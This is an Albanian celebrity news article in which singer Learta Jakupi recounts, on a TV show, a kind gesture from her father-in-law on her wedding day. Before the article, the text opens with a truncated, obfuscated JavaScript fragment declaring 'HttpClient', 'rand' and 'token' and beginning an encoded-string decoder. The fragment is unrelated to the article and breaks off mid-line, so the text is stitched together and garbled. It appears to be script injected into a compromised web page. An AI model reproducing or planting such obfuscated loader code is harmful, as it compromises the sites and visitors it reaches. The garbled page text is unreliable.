;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Në ditën e martesës, ja çfarë kishte bërë vjehrri për Learta Jakupin

By

Emri i saj u bë shumë i njohur për publikun shqiptar në momentin që ajo u martua me Kushtrim Salihun, djalin e këngëtares së famshme të muzikës popullore, Shyhrete Behlulit.

Por Learta Jakupi, më vonë zbuloi se është një solo këngëtare soprano, dhe publikut ia mori edhe më shumë zemrën kur lansoi këngën e parë me vjehrrën e saj.

E përderisa u bë e famshme nga dasma, mbrëmë në Nd’rrimin e Natës, Jakupi ka folur për njërën nga ditët më të rëndësishme në jetën e saj dhe se si e kishte përjetuar të qenit nuse.

Ajo kishte qajtë në momentin që kishte dalë nga shtëpia e babait, por ka dhënë një rrëfim interesant, që lidhet me vjehrrin e saj, Lulzim Salihun.

“Kur shkuam në shtëpi pasi më morën krushqit, babai i Kushtrimit, babi Lul, më tha: a u qetësua gjithcka, hajde tash shkoni me Kushtrimin pijeni nga një kafe te prindërit e tu. Me këtë gjest ai deshi të më tregonte se të jesh nuse nuk është më si më parë dhe se unë ende jam vajza e prindërve të mi”, ka thënë Learta.

Emisionin e plotë mund ta ndiqni në linkun më poshtë:

Artikuj të ngjashëm